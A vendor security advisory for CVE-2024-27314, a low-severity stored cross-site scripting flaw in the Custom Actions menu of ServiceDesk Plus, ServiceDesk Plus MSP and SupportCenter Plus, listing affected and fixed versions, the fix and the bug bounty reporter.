CVE ID : CVE-2024-27314
| Product Name | Severity | Affected Version(s) | Fixed Version | Fixed On |
|---|---|---|---|---|
| ServiceDesk Plus | Low | 14720 and below | 14730 | May 2, 2024 |
| ServiceDesk Plus MSP | Low | 14710 and below | 14720 | May 22, 2024 |
| SupportCenter Plus | Low | 14710 and below | 14720 | May 22, 2024 |
Details
A stored cross-site scripting (XSS) vulnerability allowed users with the SDAdmin role to inject a malicious JavaScript in the Custom Actions menu on the request details page. The script is executed when a user opens a request, accesses the custom menu, and clicks on the button with the Execute script action type.
We fixed the issue by encoding data during client rendering to prevent the JavaScript from being executed.
Impact
The vulnerability can be exploited by threat actors who have SDAdmin role to perform further attacks.
Steps to upgrade
Acknowledgements
This vulnerability was reported by Fabrizio on our bug bounty portal.
If you have any questions or concerns, please contact product support at the email addresses below.
ServiceDesk Plus: support@servicedeskplus.com
ServiceDesk Plus MSP: support@servicedeskplusmsp.com
SupportCenter Plus: support@supportcenterplus.com